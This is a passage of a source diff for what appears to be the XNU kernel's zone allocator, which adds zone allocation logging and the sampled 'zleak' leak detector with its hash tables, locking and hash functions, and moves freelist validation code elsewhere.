zlog arg is used to specify the zone name that should be logged, + * and zrecs is used to control the size of the log. + * + * If zrecs is not specified, a default value is used. + */ +static void +zone_setup_logging(zone_t z) +{ + char zone_name[MAX_ZONE_NAME]; /* Temp. buffer for the zone name */ + char zlog_name[MAX_ZONE_NAME]; /* Temp. buffer to create the strings zlog1, zlog2 etc... */ + char zlog_val[MAX_ZONE_NAME]; /* the zone name we're logging, if any */ + + /* + * Don't allow more than ZRECORDS_MAX records even if the user asked for more. + * + * This prevents accidentally hogging too much kernel memory + * and making the system unusable. + */ + if (log_records > ZRECORDS_MAX) { + log_records = ZRECORDS_MAX; + } + + /* + * Append kalloc heap name to zone name (if zone is used by kalloc) + */ + snprintf(zone_name, MAX_ZONE_NAME, "%s%s", zone_heap_name(z), z->z_name); + + /* zlog0 isn't allowed. */ + for (int i = 1; i <= max_num_zones_to_log; i++) { + snprintf(zlog_name, MAX_ZONE_NAME, "zlog%d", i); + + if (PE_parse_boot_argn(zlog_name, zlog_val, sizeof(zlog_val)) && + track_this_zone(zone_name, zlog_val)) { + z->zone_logging = true; + num_zones_logged++; + break; + } + } + + /* + * Backwards compat. with the old boot-arg used to specify single zone + * logging i.e. zlog Needs to happen after the newer zlogn checks + * because the prefix will match all the zlogn + * boot-args. + */ + if (!z->zone_logging && + PE_parse_boot_argn("zlog", zlog_val, sizeof(zlog_val)) && + track_this_zone(zone_name, zlog_val)) { + z->zone_logging = true; + num_zones_logged++; + } + + + /* + * If we want to log a zone, see if we need to allocate buffer space for + * the log. + * + * Some vm related zones are zinit'ed before we can do a kmem_alloc, so + * we have to defer allocation in that case. + * + * zone_init() will finish the job. + * + * If we want to log one of the VM related zones that's set up early on, + * we will skip allocation of the log until zinit is called again later + * on some other zone. + */ + if (z->zone_logging && startup_phase >= STARTUP_SUB_KMEM_ALLOC) { + zone_enable_logging(z); + } +} + +/* + * Each record in the log contains a pointer to the zone element it refers to, + * and a small array to hold the pc's from the stack trace. A + * record is added to the log each time a zalloc() is done in the zone_of_interest. For leak debugging, + * the record is cleared when a zfree() is done. For corruption debugging, the log tracks both allocs and frees. + * If the log fills, old records are replaced as if it were a circular buffer. + */ + + +/* + * Decide if we want to log this zone by doing a string compare between a zone name and the name + * of the zone to log. Return true if the strings are equal, false otherwise. Because it's not + * possible to include spaces in strings passed in via the boot-args, a period in the logname will + * match a space in the zone name. + */ + +/* + * Test if we want to log this zalloc/zfree event. We log if this is the zone we're interested in and + * the buffer for the records has been allocated. + */ + +#define DO_LOGGING(z) (z->zlog_btlog != NULL) +#else /* !ZONE_ENABLE_LOGGING */ +#define DO_LOGGING(z) 0 +#endif /* !ZONE_ENABLE_LOGGING */ +#if CONFIG_ZLEAKS + +/* + * The zone leak detector, abbreviated 'zleak', keeps track of a subset of the currently outstanding + * allocations made by the zone allocator. Every zleak_sample_factor allocations in each zone, we capture a + * backtrace. Every free, we examine the table and determine if the allocation was being tracked, + * and stop tracking it if it was being tracked. + * + * We track the allocations in the zallocations hash table, which stores the address that was returned from + * the zone allocator. Each stored entry in the zallocations table points to an entry in the ztraces table, which + * stores the backtrace associated with that allocation. This provides uniquing for the relatively large + * backtraces - we don't store them more than once. + * + * Data collection begins when the zone map is 50% full, and only occurs for zones that are taking up + * a large amount of virtual space. + */ +#define ZLEAK_STATE_ENABLED 0x01 /* Zone leak monitoring should be turned on if zone_map fills up. */ +#define ZLEAK_STATE_ACTIVE 0x02 /* We are actively collecting traces. */ +#define ZLEAK_STATE_ACTIVATING 0x04 /* Some thread is doing setup; others should move along. */ +#define ZLEAK_STATE_FAILED 0x08 /* Attempt to allocate tables failed. We will not try again. */ +static uint32_t zleak_state = 0; /* State of collection, as above */ +static unsigned int zleak_sample_factor = 1000; /* Allocations per sample attempt */ + +bool panic_include_ztrace = FALSE; /* Enable zleak logging on panic */ +vm_size_t zleak_global_tracking_threshold; /* Size of zone map at which to start collecting data */ +vm_size_t zleak_per_zone_tracking_threshold; /* Size a zone will have before we will collect data on it */ + +/* + * Counters for allocation statistics. + */ + +/* Times two active records want to occupy the same spot */ +static unsigned int z_alloc_collisions = 0; +static unsigned int z_trace_collisions = 0; + +/* Times a new record lands on a spot previously occupied by a freed allocation */ +static unsigned int z_alloc_overwrites = 0; +static unsigned int z_trace_overwrites = 0; + +/* Times a new alloc or trace is put into the hash table */ +static unsigned int z_alloc_recorded = 0; +static unsigned int z_trace_recorded = 0; + +/* Times zleak_log returned false due to not being able to acquire the lock */ +static unsigned int z_total_conflicts = 0; + +/* + * Structure for keeping track of an allocation + * An allocation bucket is in use if its element is not NULL + */ +struct zallocation { + uintptr_t za_element; /* the element that was zalloc'ed or zfree'ed, NULL if bucket unused */ + vm_size_t za_size; /* how much memory did this allocation take up? */ + uint32_t za_trace_index; /* index into ztraces for backtrace associated with allocation */ + /* TODO: #if this out */ + uint32_t za_hit_count; /* for determining effectiveness of hash function */ +}; + +/* Size must be a power of two for the zhash to be able to just mask off bits instead of mod */ +static uint32_t zleak_alloc_buckets = CONFIG_ZLEAK_ALLOCATION_MAP_NUM; +static uint32_t zleak_trace_buckets = CONFIG_ZLEAK_TRACE_MAP_NUM; + +vm_size_t zleak_max_zonemap_size; + +/* Hashmaps of allocations and their corresponding traces */ +static struct zallocation* zallocations; +static struct ztrace* ztraces; + +/* not static so that panic can see this, see kern/debug.c */ +struct ztrace* top_ztrace; + +/* Lock to protect zallocations, ztraces, and top_ztrace from concurrent modification. */ +static LCK_GRP_DECLARE(zleak_lock_grp, "zleak_lock"); +static LCK_SPIN_DECLARE(zleak_lock, &zleak_lock_grp); + +/* + * Initializes the zone leak monitor. Called from zone_init() + */ +__startup_func +static void +zleak_init(vm_size_t max_zonemap_size) +{ + char scratch_buf[16]; + boolean_t zleak_enable_flag = FALSE; + + zleak_max_zonemap_size = max_zonemap_size; + zleak_global_tracking_threshold = max_zonemap_size / 2; + zleak_per_zone_tracking_threshold = zleak_global_tracking_threshold / 8; + +#if CONFIG_EMBEDDED + if (PE_parse_boot_argn("-zleakon", scratch_buf, sizeof(scratch_buf))) { + zleak_enable_flag = TRUE; + printf("zone leak detection enabled\n"); + } else { + zleak_enable_flag = FALSE; + printf("zone leak detection disabled\n"); + } +#else /* CONFIG_EMBEDDED */ + /* -zleakoff (flag to disable zone leak monitor) */ + if (PE_parse_boot_argn("-zleakoff", scratch_buf, sizeof(scratch_buf))) { + zleak_enable_flag = FALSE; + printf("zone leak detection disabled\n"); + } else { + zleak_enable_flag = TRUE; + printf("zone leak detection enabled\n"); + } +#endif /* CONFIG_EMBEDDED */ + + /* zfactor=XXXX (override how often to sample the zone allocator) */ + if (PE_parse_boot_argn("zfactor", &zleak_sample_factor, sizeof(zleak_sample_factor))) { + printf("Zone leak factor override: %u\n", zleak_sample_factor); + } + + /* zleak-allocs=XXXX (override number of buckets in zallocations) */ + if (PE_parse_boot_argn("zleak-allocs", &zleak_alloc_buckets, sizeof(zleak_alloc_buckets))) { + printf("Zone leak alloc buckets override: %u\n", zleak_alloc_buckets); + /* uses 'is power of 2' trick: (0x01000 & 0x00FFF == 0) */ + if (zleak_alloc_buckets == 0 || (zleak_alloc_buckets & (zleak_alloc_buckets - 1))) { + printf("Override isn't a power of two, bad things might happen!\n"); + } + } + + /* zleak-traces=XXXX (override number of buckets in ztraces) */ + if (PE_parse_boot_argn("zleak-traces", &zleak_trace_buckets, sizeof(zleak_trace_buckets))) { + printf("Zone leak trace buckets override: %u\n", zleak_trace_buckets); + /* uses 'is power of 2' trick: (0x01000 & 0x00FFF == 0) */ + if (zleak_trace_buckets == 0 || (zleak_trace_buckets & (zleak_trace_buckets - 1))) { + printf("Override isn't a power of two, bad things might happen!\n"); + } + } + + if (zleak_enable_flag) { + zleak_state = ZLEAK_STATE_ENABLED; + } +} + +/* + * Support for kern.zleak.active sysctl - a simplified + * version of the zleak_state variable. + */ +int +get_zleak_state(void) +{ + if (zleak_state & ZLEAK_STATE_FAILED) { + return -1; + } + if (zleak_state & ZLEAK_STATE_ACTIVE) { + return 1; + } + return 0; +} + +kern_return_t +zleak_activate(void) +{ + kern_return_t retval; + vm_size_t z_alloc_size = zleak_alloc_buckets * sizeof(struct zallocation); + vm_size_t z_trace_size = zleak_trace_buckets * sizeof(struct ztrace); + void *allocations_ptr = NULL; + void *traces_ptr = NULL; + + /* Only one thread attempts to activate at a time */ + if (zleak_state & (ZLEAK_STATE_ACTIVE | ZLEAK_STATE_ACTIVATING | ZLEAK_STATE_FAILED)) { + return KERN_SUCCESS; + } + + /* Indicate that we're doing the setup */ + lck_spin_lock(&zleak_lock); + if (zleak_state & (ZLEAK_STATE_ACTIVE | ZLEAK_STATE_ACTIVATING | ZLEAK_STATE_FAILED)) { + lck_spin_unlock(&zleak_lock); + return KERN_SUCCESS; + } + + zleak_state |= ZLEAK_STATE_ACTIVATING; + lck_spin_unlock(&zleak_lock); + + /* Allocate and zero tables */ + retval = kmem_alloc_kobject(kernel_map, (vm_offset_t*)&allocations_ptr, z_alloc_size, VM_KERN_MEMORY_DIAG); + if (retval != KERN_SUCCESS) { + goto fail; + } + + retval = kmem_alloc_kobject(kernel_map, (vm_offset_t*)&traces_ptr, z_trace_size, VM_KERN_MEMORY_DIAG); + if (retval != KERN_SUCCESS) { + goto fail; + } + + bzero(allocations_ptr, z_alloc_size); + bzero(traces_ptr, z_trace_size); + + /* Everything's set. Install tables, mark active. */ + zallocations = allocations_ptr; + ztraces = traces_ptr; + + /* + * Initialize the top_ztrace to the first entry in ztraces, + * so we don't have to check for null in zleak_log + */ + top_ztrace = &ztraces[0]; + + /* + * Note that we do need a barrier between installing + * the tables and setting the active flag, because the zfree() + * path accesses the table without a lock if we're active. + */ + lck_spin_lock(&zleak_lock); + zleak_state |= ZLEAK_STATE_ACTIVE; + zleak_state &= ~ZLEAK_STATE_ACTIVATING; + lck_spin_unlock(&zleak_lock); + + return 0; + +fail: + /* + * If we fail to allocate memory, don't further tax + * the system by trying again. + */ + lck_spin_lock(&zleak_lock); + zleak_state |= ZLEAK_STATE_FAILED; + zleak_state &= ~ZLEAK_STATE_ACTIVATING; + lck_spin_unlock(&zleak_lock); + + if (allocations_ptr != NULL) { + kmem_free(kernel_map, (vm_offset_t)allocations_ptr, z_alloc_size); + } + + if (traces_ptr != NULL) { + kmem_free(kernel_map, (vm_offset_t)traces_ptr, z_trace_size); + } + + return retval; +} + +static inline void +zleak_activate_if_needed(void) +{ + if (__probable((zleak_state & ZLEAK_STATE_ENABLED) == 0)) { + return; + } + if (zleak_state & ZLEAK_STATE_ACTIVE) { + return; + } + if (zone_submaps_approx_size() < zleak_global_tracking_threshold) { + return; + } + + kern_return_t kr = zleak_activate(); + if (kr != KERN_SUCCESS) { + printf("Failed to activate live zone leak debugging (%d).\n", kr); + } +} + +static inline void +zleak_track_if_needed(zone_t z) +{ + if (__improbable(zleak_state & ZLEAK_STATE_ACTIVE)) { + if (!z->zleak_on && + zone_size_wired(z) >= zleak_per_zone_tracking_threshold) { + z->zleak_on = true; + } + } +} + +/* + * TODO: What about allocations that never get deallocated, + * especially ones with unique backtraces? Should we wait to record + * until after boot has completed? + * (How many persistent zallocs are there?) + */ + /* - * Clear out the old next pointer and backup to avoid leaking the zone - * poisoning cookie and so that only values on the freelist have a valid - * cookie. + * This function records the allocation in the allocations table, + * and stores the associated backtrace in the traces table + * (or just increments the refcount if the trace is already recorded) + * If the allocation slot is in use, the old allocation is replaced with the new allocation, and + * the associated trace's refcount is decremented. + * If the trace slot is in use, it returns. + * The refcount is incremented by the amount of memory the allocation consumes. + * The return value indicates whether to try again next time. */ -void -zone_clear_freelist_pointers(zone_t zone, vm_offset_t addr) +static boolean_t +zleak_log(uintptr_t* bt, + uintptr_t addr, + uint32_t depth, + vm_size_t allocation_size) +{ + /* Quit if there's someone else modifying the hash tables */ + if (!lck_spin_try_lock(&zleak_lock)) { + z_total_conflicts++; + return FALSE; + } + + struct zallocation* allocation = &zallocations[hashaddr(addr, zleak_alloc_buckets)]; + + uint32_t trace_index = hashbacktrace(bt, depth, zleak_trace_buckets); + struct ztrace* trace = &ztraces[trace_index]; + + allocation->za_hit_count++; + trace->zt_hit_count++; + + /* + * If the allocation bucket we want to be in is occupied, and if the occupier + * has the same trace as us, just bail. + */ + if (allocation->za_element != (uintptr_t) 0 && trace_index == allocation->za_trace_index) { + z_alloc_collisions++; + + lck_spin_unlock(&zleak_lock); + return TRUE; + } + + /* STEP 1: Store the backtrace in the traces array. */ + /* A size of zero indicates that the trace bucket is free. */ + + if (trace->zt_size > 0 && bcmp(trace->zt_stack, bt, (depth * sizeof(uintptr_t))) != 0) { + /* + * Different unique trace with same hash! + * Just bail - if we're trying to record the leaker, hopefully the other trace will be deallocated + * and get out of the way for later chances + */ + trace->zt_collisions++; + z_trace_collisions++; + + lck_spin_unlock(&zleak_lock); + return TRUE; + } else if (trace->zt_size > 0) { + /* Same trace, already added, so increment refcount */ + trace->zt_size += allocation_size; + } else { + /* Found an unused trace bucket, record the trace here! */ + if (trace->zt_depth != 0) { /* if this slot was previously used but not currently in use */ + z_trace_overwrites++; + } + + z_trace_recorded++; + trace->zt_size = allocation_size; + memcpy(trace->zt_stack, bt, (depth * sizeof(uintptr_t))); + + trace->zt_depth = depth; + trace->zt_collisions = 0; + } + + /* STEP 2: Store the allocation record in the allocations array. */ + + if (allocation->za_element != (uintptr_t) 0) { + /* + * Straight up replace any allocation record that was there. We don't want to do the work + * to preserve the allocation entries that were there, because we only record a subset of the + * allocations anyways. + */ + + z_alloc_collisions++; + + struct ztrace* associated_trace = &ztraces[allocation->za_trace_index]; + /* Knock off old allocation's size, not the new allocation */ + associated_trace->zt_size -= allocation->za_size; + } else if (allocation->za_trace_index != 0) { + /* Slot previously used but not currently in use */ + z_alloc_overwrites++; + } + + allocation->za_element = addr; + allocation->za_trace_index = trace_index; + allocation->za_size = allocation_size; + + z_alloc_recorded++; + + if (top_ztrace->zt_size < trace->zt_size) { + top_ztrace = trace; + } + + lck_spin_unlock(&zleak_lock); + return TRUE; +} + +/* + * Free the allocation record and release the stacktrace. + * This should be as fast as possible because it will be called for every free. + */ +__attribute__((noinline)) +static void +zleak_free(uintptr_t addr, + vm_size_t allocation_size) { - vm_offset_t perm_value = 0; + if (addr == (uintptr_t) 0) { + return; + } + + struct zallocation* allocation = &zallocations[hashaddr(addr, zleak_alloc_buckets)]; + + /* Double-checked locking: check to find out if we're interested, lock, check to make + * sure it hasn't changed, then modify it, and release the lock. + */ + + if (allocation->za_element == addr && allocation->za_trace_index < zleak_trace_buckets) { + /* if the allocation was the one, grab the lock, check again, then delete it */ + lck_spin_lock(&zleak_lock); + + if (allocation->za_element == addr && allocation->za_trace_index < zleak_trace_buckets) { + struct ztrace *trace; + + /* allocation_size had better match what was passed into zleak_log - otherwise someone is freeing into the wrong zone! */ + if (allocation->za_size != allocation_size) { + panic("Freeing as size %lu memory that was allocated with size %lu\n", + (uintptr_t)allocation_size, (uintptr_t)allocation->za_size); + } + + trace = &ztraces[allocation->za_trace_index]; + + /* size of 0 indicates trace bucket is unused */ + if (trace->zt_size > 0) { + trace->zt_size -= allocation_size; + } - if (!zone->zfree_clear_mem) { - perm_value = ZONE_POISON; + /* A NULL element means the allocation bucket is unused */ + allocation->za_element = 0; + } + lck_spin_unlock(&zleak_lock); } +} - vm_offset_t *primary = (vm_offset_t *) addr; - vm_offset_t *backup = get_backup_ptr(zone_elem_size(zone), primary); - - *primary = perm_value; - *backup = perm_value; +#else +static inline void +zleak_activate_if_needed(void) +{ } -#if ZALLOC_ENABLE_POISONING -__abortlike -static void -zone_element_not_clear_panic(zone_t zone, void *addr) +static inline void +zleak_track_if_needed(__unused zone_t z) { - panic("Zone element %p was modified after free for zone %s%s: " - "Expected element to be cleared", addr, zone_heap_name(zone), - zone->z_name); } +#endif /* CONFIG_ZLEAKS */ +#if ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS -/* - * Validate that the element was not tampered with while it was in the - * freelist. - */ -void -zalloc_validate_element(zone_t zone, vm_offset_t addr, vm_size_t size, bool validate) +__attribute__((noinline)) +static void +zalloc_log_or_trace_leaks(zone_t zone, vm_offset_t addr, void *fp) { - if (zone->percpu) { - assert(zone->zfree_clear_mem); - zpercpu_foreach_cpu(i) { - if (memcmp_zero_ptr_aligned((void *)(addr + ptoa(i)), size)) { - zone_element_not_clear_panic(zone, (void *)(addr + ptoa(i))); + uintptr_t zbt[MAX_ZTRACE_DEPTH]; /* used in zone leak logging and zone leak detection */ + unsigned int numsaved = 0; + +#if ZONE_ENABLE_LOGGING + if (DO_LOGGING(zone)) { + numsaved = backtrace(zbt, MAX_ZTRACE_DEPTH, NULL); + btlog_add_entry(zone->zlog_btlog, (void *)addr, + ZOP_ALLOC, (void **)zbt, numsaved); + } +#endif /* ZONE_ENABLE_LOGGING */ + +#if CONFIG_ZLEAKS + /* + * Zone leak detection: capture a backtrace every zleak_sample_factor + * allocations in this zone. + */ + if (__improbable(zone->zleak_on)) { + if (sample_counter(&zone->zleak_capture, zleak_sample_factor)) { + /* Avoid backtracing twice if zone logging is on */ + if (numsaved == 0) { + numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH, fp, NULL); + } + /* Sampling can fail if another sample is happening at the same time in a different zone. */ + if (!zleak_log(zbt, addr, numsaved, zone_elem_size(zone))) { + /* If it failed, roll back the counter so we sample the next allocation instead. */ + zone->zleak_capture = zleak_sample_factor; } } - } else if (zone->zfree_clear_mem) { - if (memcmp_zero_ptr_aligned((void *)addr, size)) { - zone_element_not_clear_panic(zone, (void *)addr); - } - } else if (__improbable(validate)) { - const vm_offset_t *p = (vm_offset_t *)addr; - const vm_offset_t *end = (vm_offset_t *)(addr + size); + } - for (; p < end; p++) { - if (*p != ZONE_POISON) { - zone_element_was_modified_panic(zone, addr, - *p, ZONE_POISON, (vm_offset_t)p - addr); - } + if (__improbable(zone_leaks_scan_enable && + !(zone_elem_size(zone) & (sizeof(uintptr_t) - 1)))) { + unsigned int count, idx; + /* Fill element, from tail, with backtrace in reverse order */ + if (numsaved == 0) { + numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH, fp, NULL); } - } else { - /* - * If element wasn't poisoned or entirely cleared, validate that the - * minimum bytes that were cleared on free haven't been corrupted. - * addr is advanced by ptr size as we have already validated and cleared - * the freelist pointer/zcache canary. - */ - if (memcmp_zero_ptr_aligned((void *) (addr + sizeof(vm_offset_t)), - zp_min_size - sizeof(vm_offset_t))) { - zone_element_not_clear_panic(zone, (void *)addr); + count = (unsigned int)(zone_elem_size(zone) / sizeof(uintptr_t)); + if (count >= numsaved) { + count = numsaved - 1; + } + for (idx = 0; idx < count; idx++) { + ((uintptr_t *)addr)[count - 1 - idx] = zbt[idx + 1]; } } +#endif /* CONFIG_ZLEAKS */ } -#endif /* ZALLOC_ENABLE_POISONING */ -#pragma mark Zone Leak Detection +static inline bool +zalloc_should_log_or_trace_leaks(zone_t zone, vm_size_t elem_size) +{ +#if ZONE_ENABLE_LOGGING + if (DO_LOGGING(zone)) { + return true; + } +#endif /* ZONE_ENABLE_LOGGING */ +#if CONFIG_ZLEAKS + /* + * Zone leak detection: capture a backtrace every zleak_sample_factor + * allocations in this zone. + */ + if (zone->zleak_on) { + return true; + } + if (zone_leaks_scan_enable && !(elem_size & (sizeof(uintptr_t) - 1))) { + return true; + } +#endif /* CONFIG_ZLEAKS */ + return false; +} -/* - * Zone leak debugging code - * - * When enabled, this code keeps a log to track allocations to a particular zone that have not - * yet been freed. Examining this log will reveal the source of a zone leak. The log is allocated - * only when logging is enabled, so there is no effect on the system when it's turned off. Logging is - * off by default. - * - * Enable the logging via the boot-args. Add the parameter "zlog=" to boot-args where - * is the name of the zone you wish to log. - * - * This code only tracks one zone, so you need to identify which one is leaking first. - * Generally, you'll know you have a leak when you get a "zalloc retry failed 3" panic from the zone - * garbage collector. Note that the zone name printed in the panic message is not necessarily the one - * containing the leak. So do a zprint from gdb and locate the zone with the bloated size. This - * is most likely the problem zone, so set zlog in boot-args to this zone name, reboot and re-run the test. The - * next time it panics with this message, examine the log using the kgmacros zstack, findoldest and countpcs. - * See the help in the kgmacros for usage info. - * - * - * Zone corruption logging - * - * Logging can also be used to help identify the source of a zone corruption. First, identify the zone - * that is being corrupted, then add "-zc zlog=" to the boot-args. When -zc is used in conjunction - * with zlog, it changes the logging style to track both allocations and frees to the zone. So when the - * corruption is detected, examining the log will show you the stack traces of the callers who last allocated - * and freed any particular element in the zone. Use the findelem kgmacro with the address of the element that's been - * corrupted to examine its history. This should lead to the source of the corruption. - */ +#endif /* ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS */ +#if ZONE_ENABLE_LOGGING -/* Returns TRUE if we rolled over the counter at factor */ -__header_always_inline bool -sample_counter(volatile uint32_t *count_p, uint32_t factor) +__attribute__((noinline)) +static void +zfree_log_trace(zone_t zone, vm_offset_t addr, void *fp) { - uint32_t old_count, new_count = 0; - if (count_p != NULL) { - os_atomic_rmw_loop(count_p, old_count, new_count, relaxed, { - new_count = old_count + 1; - if (new_count >= factor) { - new_count = 0; - } - }); + /* + * See if we're doing logging on this zone. + * + * There are two styles of logging used depending on + * whether we're trying to catch a leak or corruption. + */ + if (__improbable(DO_LOGGING(zone))) { + if (corruption_debug_flag) { + uintptr_t zbt[MAX_ZTRACE_DEPTH]; + unsigned int numsaved; + /* + * We're logging to catch a corruption. + * + * Add a record of this zfree operation to log. + */ + numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH, fp, NULL); + btlog_add_entry(zone->zlog_btlog, (void *)addr, ZOP_FREE, + (void **)zbt, numsaved); + } else { + /* + * We're logging to catch a leak. + * + * Remove any record we might have for this element + * since it's being freed. Note that we may not find it + * if the buffer overflowed and that's OK. + * + * Since the log is of a limited size, old records get + * overwritten if there are more zallocs than zfrees. + */ + btlog_remove_entries_for_element(zone->zlog_btlog, (void *)addr); + } } +} - return new_count == 0; +#endif /* ZONE_ENABLE_LOGGING */ + +/* These functions outside of CONFIG_ZLEAKS because they are also used in + * mbuf.c for mbuf leak-detection. This is why they lack the z_ prefix. + */ + +/* "Thomas Wang's 32/64 bit mix functions." http://www.concentric.net/~Ttwang/tech/inthash.htm */ +uintptr_t +hash_mix(uintptr_t x) +{ +#ifndef __LP64__ + x += ~(x << 15); + x ^= (x >> 10); + x += (x << 3); + x ^= (x >> 6); + x += ~(x << 11); + x ^= (x >> 16); +#else + x += ~(x << 32); + x ^= (x >> 22); + x += ~(x << 13); + x ^= (x >> 8); + x += (x << 3); + x ^= (x >> 15); + x += ~(x << 27); + x ^= (x >> 31); +#endif + return x; } -#if ZONE_ENABLE_LOGGING -/* Log allocations and frees to help debug a zone element corruption */ -TUNABLE(bool, corruption_debug_flag, "-zc", false); +uint32_t +hashbacktrace(uintptr_t* bt, uint32_t depth, uint32_t max_size) +{ + uintptr_t hash = 0; + uintptr_t mask = max_size - 1; -#define MAX_NUM_ZONES_ALLOWED_LOGGING 10 /* Maximum 10 zones can be logged at once */ + while (depth) { + hash += bt[--depth]; + } -static int max_num_zones_to_log = MAX_NUM_ZONES_ALLOWED_LOGGING; -static int num_zones_logged = 0; + hash = hash_mix(hash) & mask; + + assert(hash < max_size); + + return (uint32_t) hash; +} /* - * The number of records in the log is configurable via the zrecs parameter in boot-args. Set this to - * the number of records you want in the log. For example, "zrecs=10" sets it to 10 records. Since this - * is the number of stacks suspected of leaking, we don't need many records. + * TODO: Determine how well distributed this is + * max_size must be a power of 2. i.e 0x10000 because 0x10000-1 is 0x0FFFF which is a great bitmask + */ +uint32_t +hashaddr(uintptr_t pt, uint32_t max_size) +{ + uintptr_t hash = 0; + uintptr_t mask = max_size - 1; + + hash = hash_mix(pt) & mask; + + assert(hash < max_size); + + return (uint32_t) hash; +} + +#endif /* !ZALLOC_TEST */ +#pragma mark zone (re)fill +#if !ZALLOC_TEST + +/*! + * @defgroup Zone Refill + * @{ + * + * @brief + * Functions handling The zone refill machinery. + * + * @discussion + * Zones are refilled based on 3 mechanisms: direct expansion, async expansion, + * VM-specific replenishment. Zones using VM-specific replenishment are marked + * with the @c z_replenishes property set. + * + * @c zalloc_ext() is the codepath that kicks the zone refill when the zone is + * dropping below half of its @c z_elems_rsv (0 for most zones) and will: + * + * - call @c zone_expand_locked() directly if the caller is allowed to block, + * + * - wakeup the asynchroous expansion thread call if the caller is not allowed + * to block. + * + * - call @c zone_replenish_locked() to kick the replenish state machine. + * + * + *

Synchronous expansion

+ * + * This mechanism is actually the only one that may refill a zone, and all the + * other ones funnel through this one eventually. + * + * @c zone_expand_locked() implements the core of the expansion mechanism, + * and will do so while a caller specified predicate is true. + * + * Zone expansion allows for up to 2 threads to concurrently refill the zone: + * - one VM privileged thread, + * - one regular thread. + * + * Regular threads that refill will put down their identity in @c z_expander, + * so that priority inversion avoidance can be implemented. + * + * However, VM privileged threads are allowed to use VM page reserves, + * which allows for the system to recover from extreme memory pressure + * situations, allowing for the few allocations that @c zone_gc() or + * killing processes require. + * + * When a VM privileged thread is also expanding, the @c z_expander_vm_priv bit + * is set. @c z_expander is not necessarily the identity of this VM privileged + * thread (it is if the VM privileged thread came in first, but wouldn't be, and + * could even be @c THREAD_NULL otherwise). + * + * Note that the pageout-scan daemon might be BG and is VM privileged. To avoid + * spending a whole pointer on priority inheritance for VM privileged threads + * (and other issues related to having two owners), we use the rwlock boost as + * a stop gap to avoid priority inversions. + * + * + *

Chunk wiring policies

+ * + * Zones allocate memory in chunks of @c zone_t::z_chunk_pages pages at a time + * to try to minimize fragmentation relative to element sizes not aligning with + * a chunk size well. However, this can grow large and be hard to fulfill on + * a system under a lot of memory pressure (chunks can be as long as 8 pages on + * 4k page systems). + * + * This is why, when under memory pressure the system allows chunks to be + * partially populated. The metadata of the first page in the chunk maintains + * the count of actually populated pages. + * + * The metadata for addresses assigned to a zone are found of 4 queues: + * - @c z_pageq_empty has chunk heads with populated pages and no allocated + * elements (those can be targeted by @c zone_gc()), + * - @c z_pageq_partial has chunk heads with populated pages that are partially + * used, + * - @c z_pageq_full has chunk heads with populated pages with no free elements + * left, + * - @c z_pageq_va has either chunk heads for sequestered VA space assigned to + * the zone forever (if @c z_va_sequester is enabled), or the first secondary + * metadata for a chunk whose corresponding page is not populated in the + * chunk. + * + * When new pages need to be wired/populated, chunks from the @c z_pageq_va + * queues are preferred. + * + * + *

Asynchronous expansion

+ * + * This mechanism allows for refilling zones used mostly with non blocking + * callers. It relies on a thread call (@c zone_expand_callout) which will + * iterate all zones and refill the ones marked with @c z_async_refilling. + * + * NOTE: If the calling thread for zalloc_noblock is lower priority than + * the thread_call, then zalloc_noblock to an empty zone may succeed. + * + * + *

Dealing with zone allocations from the mach VM code

+ * + * The implementation of the mach VM itself uses the zone allocator + * for things like the vm_map_entry data structure. In order to prevent + * an infinite recursion problem when adding more pages to a zone, @c zalloc + * uses a replenish thread to refill the VM layer's zones before they have + * too few remaining free entries. The reserved remaining free entries + * guarantee that the VM routines can get entries from already mapped pages. + * + * In order for that to work, the amount of allocations in the nested + * case have to be bounded. There are currently 2 replenish zones, and + * if each needs 1 element of each zone to add a new page to itself, that + * gives us a minumum reserve of 2 elements. + * + * There is also a deadlock issue with the zone garbage collection thread, + * or any thread that is trying to free zone pages. While holding + * the kernel's map lock they may need to allocate new VM map entries, hence + * we need enough reserve to allow them to get past the point of holding the + * map lock. After freeing that page, the GC thread will wait in + * @c zone_reclaim() until the replenish threads can finish. + * Since there's only 1 GC thread at a time, that adds a minimum of 1 to the + * reserve size. + * + * Since the minumum amount you can add to a zone is 1 page, + * we'll use 16K (from ARM) as the refill size on all platforms. + * + * When a refill zone drops to half that available, i.e. REFILL_SIZE / 2, + * @c zalloc_ext() will wake the replenish thread. The replenish thread runs + * until at least REFILL_SIZE worth of free elements exist, before sleeping again. + * In the meantime threads may continue to use the reserve until there are only + * REFILL_SIZE / 4 elements left. Below that point only the replenish threads + * themselves and the GC thread may continue to use from the reserve. */ -#if defined(__LP64__) -#define ZRECORDS_MAX 2560 /* Max records allowed in the log */ -#else -#define ZRECORDS_MAX 1536 /* Max records allowed in the log */ -#endif -#define ZRECORDS_DEFAULT 1024 /* default records in log if zrecs is not specificed in boot-args */ - -static TUNABLE(uint32_t, log_records, "zrecs", ZRECORDS_DEFAULT); +static thread_call_data_t zone_expand_callout; -static void -zone_enable_logging(zone_t z) +static inline kma_flags_t +zone_kma_flags(zone_t z, zalloc_flags_t flags) { - z->zlog_btlog = btlog_create(log_records, MAX_ZTRACE_DEPTH, - (corruption_debug_flag == FALSE) /* caller_will_remove_entries_for_element? */); + kma_flags_t kmaflags = KMA_KOBJECT | KMA_ZERO; - if (z->zlog_btlog) { - printf("zone: logging started for zone %s%s\n", - zone_heap_name(z), z->z_name); - } else { - printf("zone: couldn't allocate memory for zrecords, turning off zleak logging\n"); - z->zone_logging = false; + if (z->z_noencrypt) { + kmaflags |= KMA_NOENCRYPT; + } + if (flags & Z_NOPAGEWAIT) { + kmaflags |= KMA_NOPAGEWAIT; + } + if (z->z_permanent || (!z->z_destructible && z->z_va_sequester)) { + kmaflags |= KMA_PERMANENT; } + if (z->z_submap_idx == Z_SUBMAP_IDX_GENERAL && + z->kalloc_heap != KHEAP_ID_NONE) { + kmaflags |= KMA_KHEAP; + } + + return kmaflags; } -/** - * @function zone_setup_logging +/*! + * @function zcram_and_lock() * - * @abstract - * Optionally sets up a zone for logging. + * @brief + * Prepare some memory for being usable for allocation purposes. * * @discussion - * We recognized two boot-args: + * Prepare memory in [addr + ptoa(pg_start), addr + ptoa(pg_end)) + * to be usable in the zone. * - * zlog= - * zrecs= + * This function assumes the metadata is already populated for the range. * - * The zlog arg is used to specify the zone name that should be logged, - * and zrecs is used to control the size of the log. + * 